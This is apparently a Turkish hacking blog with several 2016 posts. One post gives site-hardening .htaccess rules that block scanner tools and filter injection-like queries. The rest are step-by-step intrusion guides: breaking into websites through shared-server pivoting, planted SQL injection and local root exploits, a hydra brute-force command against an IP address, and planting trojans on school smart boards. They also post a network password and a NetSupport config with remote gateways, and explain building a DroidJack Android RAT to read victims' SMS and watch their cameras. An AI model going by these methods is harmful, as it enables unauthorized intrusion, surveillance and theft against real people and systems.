15 Ekim 2016 Cumartesi

Güvenli Web site Oluşturma


Merhabalar, bu konuda uygun fiyata site güvenliği nasıl sağlanıldığını anlatacağım.

Öncelikle site güvenliğimiz için güvenli domain firması seçiyoruz. Domain firması bizim web  sitemize erişebiliyor.
 Türk domain firmalarından satın alırsak hem daha pahalı hem güvenliğimizi azaltacağı için direk ana  bayi den satın alıyoruz.
Ben godaddy üzerinden anlatacağım.
 tr.godaddy.com adresinden domain adımızı yapıp sepete ekliyoruz.
 Domain satın alırken admin e-maili çok önemlidir aa.com sitesinin admin e-mail adresi domain@site.com olursa site.com sitesine erişilip mail paneline erişildiği taktirde aa.com sitesine erişilir.
 Bu yüzden alan adımızla eşleşen e-mail satın alıp info@aa.com admin@aa.com gibi e-mail satın alıp admin mail adresimize ekliyoruz. Veya sunucu satın alırken mail satın alabilirsiniz.
 Whois bilgilerimizi gizlemek site güvenliğini arttırır. Telefon numaranızı- adres bilgilerinizi gizler.
 domain süreniz dolduğunda aynı alan adı ile domain açılmaz vs.
 Daha sonra domain satın alıp hosting işlemlerine geçelim.
 Basit bir hosting satın alırsak sunucuda bulunan diğer sitelerden hedef siteye erişebilir.
 Sunucu satın alıp site.com'a ait dns veriyor.
 örn: ns1.site.com  ns2.site.com
 Satın aldığımız zaman serverda tek site olduğu için diğer sitelerden girip sitenizi hackleyemezler.
 site.org site.info gibi birçok site kuracaksanız her bir siteye yeni bir ip adresi alın.
 Daha sonra sitemize uygun script seçelim. Mümkünse scripti kendimiz kodlayalım (Güvenliği arttırır)
 400$ vBulletin scripti sürümlerinde bile güvenlik açığı görülebiliyor.
 Scripti kurduktan sonra ip üzerinde ftp-ssh-mysql-mssql hesapları kuracaksanız şifrenizin güvenliği çok önemlidir. 1milyarlık şifre kelimesinin içinde bile olmayan şifreler seçin.
 Veritabanı kesinlikle güçlü bir şifreleme ile saklanmalıdır.
 Sitenizin admin panelini kesinlikle gizli tutun. Gerekirse subdomain açıp sadece localhosta erişim verin. 2082 ve 2083 portu kapalı olsun.
  Sunucunuzdaki sitenizde açık tarama programlarını imha etmek için .htaccess dosyasına kodları yapıştırın.

RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} Acunetix [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule> 

 Xss açıklarını engellemek için .htaccess dosyasına kodları yapıştırın

RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php|forum.php|yaz.php [F,L]


 SQL İnjection engellemek için .htaccess dosyasına kodları yapıştırın

 RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{REQUEST_URI} ^/(,|;|<|>|/{2,999}).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww|curl|wget|python|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{HTTP_COOKIE} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\\.0\\.0\\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} [^a-z](|order|union|declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
RewriteRule (.*) - [F] 

 Bu kodlar Sql ve Xss açıklarını filtreler. Çoğu exploit çalışmaz. Bypass yapılabilir fakat zordur.

Not: Web sitenize her cihazdan ve ağdan giriş yapmayın. 
 
 Herşeyi halledip keylogger & trojan yemezsiniz herhalde :)



27 Eylül 2016 Salı

Hedef siteye erişme (Hackleme)


 Merhaba arkadaşlar, bu konuda hedef siteye 8 farklı methodla erişmeyi göstereceğim.

1.) Web uygulama açıklarını bulup siteye erişmeye çalışıyoruz. SQL injection, Blind sql injection,
Admin Login injection, Remote Code Execute(Rce), Remote Command Execute, Cross Site Scripting, Cross-Site Request Forgery ,Bof, Lfi , Rfi gibi açıkları bulup exploit ediyoruz.
Site hazır script kullanıyorsa scriptin sürümünü öğrenip exploit-db.com 0day.today  gibi
 Exploit sitelerinden exploit bulup exploit ediyoruz.
 Güvenlik açığı bulmak için hazır scriptleri kullanmanıza gerek yok tüm açıklıkları en ince
 ayrıntısına kadar inceleyin sonra manuel olarak açıklıkları nasıl buluyorsanız programa dökün. premium açık tarama programlarından daha iyi sonuç verecektir : )
2.) Hedef sitede güvenlik açıkları yok ise whois çekip sitenin kullandığı nameserverlara bakıyoruz veya ip adresini öğrenip bing de ip: şeklinde taratıp ip uzerindeki diğer siteleri buluyoruz. örnek: sitenin ip adresi 111.111.111.111 olsun bing.com dan ip:111.111.111.111
 Şeklinde taratıyoruz veya who.is/nameserver den whois sonucu cıkan nameserverleri yazıp serverdaki diger siteleri görebiliyoruz. 
ip aralıklarındada aynı aynı serverda olan sitelere rastlanabiliyor.
 https://ct-scorpi10.blogspot.com/2016/09/web-sitesinde-ip-aralklar-taramas.html
 Siteleri listeledikten sonra aynı sitelere 1.methodu kasıyoruz. Her sitede güvenlik açığı    arıyoruz aynı serverdaki siteye erişdiğimizde ise servera shell atıp local root exploitleri ile 
  serverda root oluyoruz veya webr00t shell ile config okuyup serverdaki diğer sitelere  erişebiliyoruz. 2methotda olmadıysa  webr00t shellin cgitelnet shellini çalıştırıp cat  /etc/passwd komutunu giriyoruz. Serverdaki tüm kullanıcıları gösterir. Genellikle site isimleri gibi kullanıcı adları olur.
 örn: portwood:*:11401134:100450:portwood:/home/content/34/11401134:/sbin/nologin
 portwood kullanıcısının sitesi portwood.com .org olma olasılığı yüksektir. Configde gördüğümüz gibi sitenin dizini  /home/content/34/11401134 cd komutu ile servarın dizinine gidiyoruz. İzinler yok ise chmod izni yok ise ;
 https://ct-scorpi10.blogspot.com/2016/09/chmod-change-mod-nedir.html
 konudan chmodu öğrenip bulunduğunuz dizine perm yetkisi verip sitenin bulunduğu dizine erişip indexinizi upload edebilirsiniz.
3.) who.is den sitemize whois çekiyoruz Sitenin admin e-mail adresini bulup 1 ve 2. methodları admin e-mail sitesine kasıyoruz. Admin e-mailin bulunduğu siteye eriştiğimiz zaman yönetim panelinden mail panelini bulup mailin şifresini alıp domain firmasından şifremi unuttum çekip hedef siteye erişebiliyoruz. Eğer mail panelini bulamassanız sitedeki bir php veya asp dosyasını editleyip SQL injection oluşturulabilecek kodları başa girip sqlninja,sqlmap ile veritabanı çekip mailin şifresine erişebiliyoruz : )
4.) Bu methodda ise serverın bulunduğu siteye whois cekip nameserverlarına bakın site ile aynı serverda olmayabilir 1.3 methodları uyguluyoruz serverin bulundugu domaine erişirsek nameserverları kontrol edip hedef siteye erişebilirsiniz veya domain süresi bitmeye yakın ise bittiği gün aynı domain ismi ile 1and1.com dan 1dolara domain alıp 1yıllık index basabilirsiniz :) 
 Hedef sitemiz domaini türk sitelerinden satın almışsa örn:alastry.com yoncu.com gibi sitelerden almış ise pdr nin bayiliğini yapıyor yani yoncu.com sitesi veya publicdomainregistry.com 2siteden birine 1,2,3 deki methodları uygulayıp erişirseniz  domain panelinden hedef siteye erişmiş olursunuz.
5.) Siteye ctrl+u tuşu ile sayfa kaynak kodlarına bakıyoruz kullandığı scripte bakıp wordpress ise wordpress.com sitesine 1den 4 e kadar tüm methodları uyguluyoruz. 
 Mybb ise mybb nin sitesine vb.
 Hazır script sitelerine erişmek zor olsada eriştiğinizde hedef siteye erişebilirsiniz.
6.) Nmap ile sitede açık portlara bakın 1433 MsSQL 3306 MySQL  3050 gbs_db veya 1521 Oracle portlarından birtanesi açık ise ki localhostda değilse veritabanı için bu portların açık olması şart. açık olan porta ddos atıp database hatası verecektir. Hatanın verdiği ip adresine tüm methodları kasıp SQL yi dump ederseniz veritabanı bilgileri ile hedef siteye erişmiş olursunuz.
7.) Serverda  navicat, Firezilla gibi programlar  kulanılıyorsa kullanıldığı programın exploiti bulup erişebilirsiniz 
 örn: http://0day.today/exploits/25371
veya navicat gibi programların bağlı olduğu ip ye methodları kasın eriştiğinizde navicat yönetim panelinden hedef site admini ip adresi port numarası şifresi girdiğinde shell üzerinden loglayıp siteye erişebilirsiniz.
8.) Xhydra ile serverdaki ftp veya ssh hesaplarına brute force uygululuyoruz.
 Terminali açıp hydra -s 21 -v -V  -l kullanıcı adı eğer kullanıcı adını bilmiyorsanız -L olacak
 -P şifre wordlist dizini ftp://ip adresi şeklince komutu giriyoruz.
 örn: hydra -s 21 -v -V -L root/Desktop/kadları -P /root/Desktop/wordlist.txt ftp://78.143.98.210
 şeklinde komutu girip saldırımızı yapıyoruz.
 Serverdaki herhangi bir ftp hesabının şifresini alıp firezilla ile bağlanıp chmod 777 yaparak anadizine shellimizi upload ediyoruz. 2.methothodu kasıp serverdaki hedef siteye erişiyoruz.
 Methodları anlatmam 1saatimi aldı kaynak belirtmeden çalana hakkımı helal etmiyorum. 
 Siber Yazılımcı Grubuna Özel yazılmıştır





23 Eylül 2016 Cuma

Akıllı tahtaya erişme (hackleme)

Merhaba arkadaşlar bu konuda akıllı tahtaya remote (uzaktan) nasıl erişildiğini anlattım.

 Öncelikle anlatacağım işlemleri yalnız veya samimi arkadaşlarla yapın.
 örn: Beden dersinde, ve çıkış zilinden 5-10dakika sonra gibi süre içinde yapabilirsiniz
 Akıllı tahtalarda deepfreeze var ise görev yöneticisinden veya sağ alt kısımda deepfreeze ye sağ  tıklayıp kapatın aksi taktirde yapacağınız işlemler bilgisayar yeniden başlatana kadar sürecektir.

 1.) Usb rubber ducky methodu ile akıllı tahtaya 15sn içinde takıp çıkarın sonra kendi bilgisayarınıza   takın usb linux ise linux komutları ile akıllı tahtaya erişebilirsiniz.

  https://www.facebook.com/hackerowl/photos/a.1417176048298381.1073741828.1414225218593464/1464900250192627
  Facebook sayfamda usb nin nasıl hazırlanacağını anlattım.

 2.) Önce spy-net & Darkcoment gibi uygulamalar ile trojanımızı oluşturuyoruz.
     Oluşturduğumuz trojan(rat) telefonumuza yükleyip zip yapıyoruz.
     Rat bilmeyen varsa konuya edit yapıp anlatacağım.
      Akıllı tahtaya Alpemix veya Teamwiever gibi uygulamalar yüklü ise açıp ıd şifreyi alıp            telefondan ziplediğimiz trojanı akıllı tahtaya sürükleyip unzip yapıyoruz ve trojanı kolaylıkla yutuyor!
 Trojan yedirmek istemeyen arkadaşlar için exploitde kullanabilirler.
 örn: 0day.today/exploit/25390
 3.) Alpemix veya Teamwiever gibi uygulamalar kurulu değilse trojanımızı herhangi bir upload  sitesine upload ediyoruz.
  Akıllı tahtadan trojanı indirip çalıştırabilirsiniz.
 Ancak!
 Trojan yedirdikten sonra restart sonucu trojan kayboluyorsa deepfreeze vb. uygulamaları denetim masası veya görev yöneticisinden devre dışı bırakmamız gerekiyor.
4:) f@tih ağına bağlanın password: !1qaz2WSX3edc4RFV%56 Bağlandıktan sonra
 Androidde: Zanti Dsploit gibi uygulumalarla sniff çekip akıllı tahtaya erişebilirsiniz.
 Linuxda : SniffJoje & Wireshark & Dsniff... gibi uygulamalarda sniffing yapabilirsiniz.

5.) Akıllı tahtada Netsupport uygulaması var ise ki %99 olması lazım
  Evde bilgisayarınıza Netsupport kurun.
  Kurduktan sonra Netsupport tech Console kısmından Licensee kısmına gelip serial numberi    kopyalıyoruz.
  nssadmui.exe/Netsupport client32.ini dosyasını config ayarımızı yapıştırıyoruz.
 örnek ; 
  [Client]
_present=1
Password=1148745314
Protocols=2,3
RoomSpec=VESTEL
SecurityKey=GD<DAMDO9N?HDFGK;O@JCL9B=PBKGL
UnloadMirrorOnDisconnect=1
Usernames=*/1148745314

[_Info]
Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini

[Audio]
DisableAudioFilter=0

[General]
Password=EM:B>LDFHI<NAIEN:K>CAGFI<C@JEP

[HTTP]
GatewayAddress=88.249.193.13:443
GSK=HD<E@GDOHB;H@LEM;F?NDM9G>GCMHK
SecondaryGateway=88.249.194.108:443
SecondaryPort=443

kodları yapıştırıp Bilgisayarınızdan netsupport programı ile akıllı tahtaya erişebilirsiniz.
 Siz kendiniz config dosyasınızı kendinize göre düzenleyin

 Not : Akıllı tahtalar flash bellek ile açılıyorsa pardus ile çalıştırıp msconfig ile windowsa geçiş yapın.

 Netsupport İndirme Linki : https://cloud.mail.ru/public/0fc4747b6a6c/NSS11TR.rar








18 Eylül 2016 Pazar

Chmod (Change mod) Nedir?


Chmod linux serverlarda erişim iznini ayarlayan mod dur.
 Chmod ayarı sayesinde serverdaki dosyalara okuma-yazma-değiştirme gibi yetkiler kullanıcılara göre ayarlanabilir.

 chmod 644 dosyalarda sadece okuma yetkisi bulunmaktadır.
 chmod 755 dosyalarda okuma ve çalıştırma yetkisi bulunmaktadır.
 chmod 777 dosyalarda ise okuma, çalıştırma ve yazma izni olur.

 chmod 644 ve 755 olan dosyalarda yazma izniniz yoktur.
 Dosya ve klasöre chmod ayarını 777 ayarlamak için
 chmod- 777- klasör adı-  şeklinde servera komut girerek klasöre full yetki verebiliriz.
 örn : chmod 777 .htaccess

 tüm klasörleri 777 yapmak için,
 for i in `find . -type d`; do chmod 777 $i; done

 tüm dosyaları 755 yapmak için,
for i in `find . -type f`; do chmod 755 $i; done

tüm dosyaları 644 yapmak için,
for i in `find . -type f`; do chmod 644 $i; done

 php uzantılı dosyaları 644 yapmak için,
find . -type f -name '*.php' -print0 | xargs -0 chmod 0644

  Komutunu giriyoruz.

  find / -type f -perm -2 -ls / Serverdaki tüm yazılabilir dosyaları bulur.

find . -type d -perm -2 -ls / Bulunduğunuz dizindeki tüm yazılabilir dosyaları bulur.

16 Eylül 2016 Cuma

Android Telefon Hackleme (DroidJack)


  Rat ile Android Telefonların nasıl hacklenebildiğini anlatıcağım.
  Aşağıda vereceğim programı indirip kuruyoruz.
  Duckdns.org dan  kayıt oluyoruz facebook & gmail hesabınız varsa direk bağlanın.
  Subdomain oluşturuyoruz ve işletim sistemine uygun programı bulup indiriyoruz.
  Duckdns programına sitedeki tokeni yazıyoruz ve bağlanıyoruz.
  Droidjack'a gelirsek generate apk kısmında  subdomain adresimizi ve açacağımız port u yazıyoruz.
  örn: scorpi10.duckdns.org port da 1604 portunu öneririm.
  Modem arayuzunden portumuzu açtıktan sonra Generate seçeneğine tıklayıp apk yı oluşturuyoruz.
  Devices bölümünden 1604 portumuzu dinliyoruz.
  Hedef kişiye oluşan apk yı yedirdiğimizde telefonu restart yaptıktan sonra bağlantıyı alacağız.
  Bağlantı geldikten sonra sağ tıklayıp telefonu dinleyebilir, sms leri okuyabilir, ön ve arka kamerasını   İzleyebilir, telefon numarasını ve imei numarasını öğrenenip rehberini kopyalayabilir,
  İstediğiniz kişiyi arayıp sms atabilirsiniz.

  İndirme Linki : http://www.mediafire.com/download/z830ija4ou2c81b/DroidJack.4.4._ed.rar
 

Wordlist (Parola Listesi) Hazırlama aracı Crunch


 Brute force yaparken parola listesi lazım olduğu için ve sağlam listeler aramak çok zamanımızı alır.
 Aramak yerine size nasıl wordlist yapıldığını anlattım.
 Not: Tool sadece Kali linuxda çalışmaktadır.
 Öncelikle Terminali açıp crunch yazıyoruz.
  crunch en az uzunluk - en fazla uzunluk - şifre kombinasyonu -o dosya ismi şeklinde olacaktır.
   Örn: crunch 4 7  1234567 -o sifreler.txt  komutu giriyoruz.
  en az 4 haneli en fazla 7 haneli 1234567 kombinasyonunu karıştırarak wordlist hazırlayacaktır.
  kelime ve sayı  wordlisti hazırlamak istiyorsak ;
  Örn: crunch 4 16 qwertyuıopğüasdfghjklşizxcvbnmöç123456789 -o şifreler.txt
  Şeklinde girdigimiz taktirde brute force yaparken kırma oranı  %95 a kadar çıkabiliyor.





13 Eylül 2016 Salı

Sunucudaki sitelerden Hedef siteye geçiş


   Hedef site hacklemenin bir diğer methoduda aynı sunucudaki siteleri hackleyip hedef siteye geçiş   sağlamaktır.

 Bu konuda Sunucudaki sitelerden hedef siteye nasıl erişilebildiğini anlattım.

  ct-scorpi10.blogspot.com/2016/09/hedef-sitenin-sunucusundaki-siteleri.html
  Öncelikle linkdeki konuda sunucudaki sitelerin listelenmesine bakıp sunucudaki siteleri listeleyiniz.
  https://ct-scorpi10.blogspot.com/2016/09/web-sitesinde-ip-aralklar-taramas.html
  linkdeki konudan ip aralıkları taraması yapıp siteleri txt dosyasına kaydedin.
  Veya sitenin nameserverlarını öğrenip sunucuya whois cekip siteleri çekebilirsiniz.
  Kaydettiğiniz sitelerde web güvenlik açıklıkları taratın.
  Sunucudaki sitelerden birinde mutlaka güvenlik açığı bulunacaktır.
  https://ct-scorpi10.blogspot.com/2016/09/hedef-sitede-admin-panel-nasl-bulunur.html
  Açığı bulduğunuz siteyi exploit edip
  ct-scorpi10.blogspot.com/2016/09/hedef-sitede-admin-panel-nasl-bulunur.html
  Admin paneli bulup sunucuya shell atın.
  https://ct-scorpi10.blogspot.com/2016/09/safe-mod-kapatma-off-islemleri.html
  Linkdeki anlattığım konudan safe modu kapatın.
  https://ct-scorpi10.blogspot.com/2016/09/kali-linux-uzerinden-weevely-ile.html
  Linux kullanıcıları weevely uzerinden
  https://ct-scorpi10.blogspot.com/2016/09/dcpl-exploiti-ile-backconnect-olma.html
  Windows kullanıcıları dc exploiti ile backconnect olsun.
  Backconnect olduğunuz sunucuda uname -a komutu girip serverın kernel surumunu öğrenip
  Kernel surumune uygun local root exploit buluyoruz.
  0day.today & exploit-db.com dan
  Bulduğunuz exploiti wget -r komutu ile çekip çalıştırıp root olabilirsiniz.
  Root olduğunuz sunucuda hedef sitenin dizinine gelip index dosyanızı upload edebilirsiniz.

Konu çok uzun olduğu için sadece 1methodu anlattım. İstek geldiği surece diğer methodları anlatıcağım.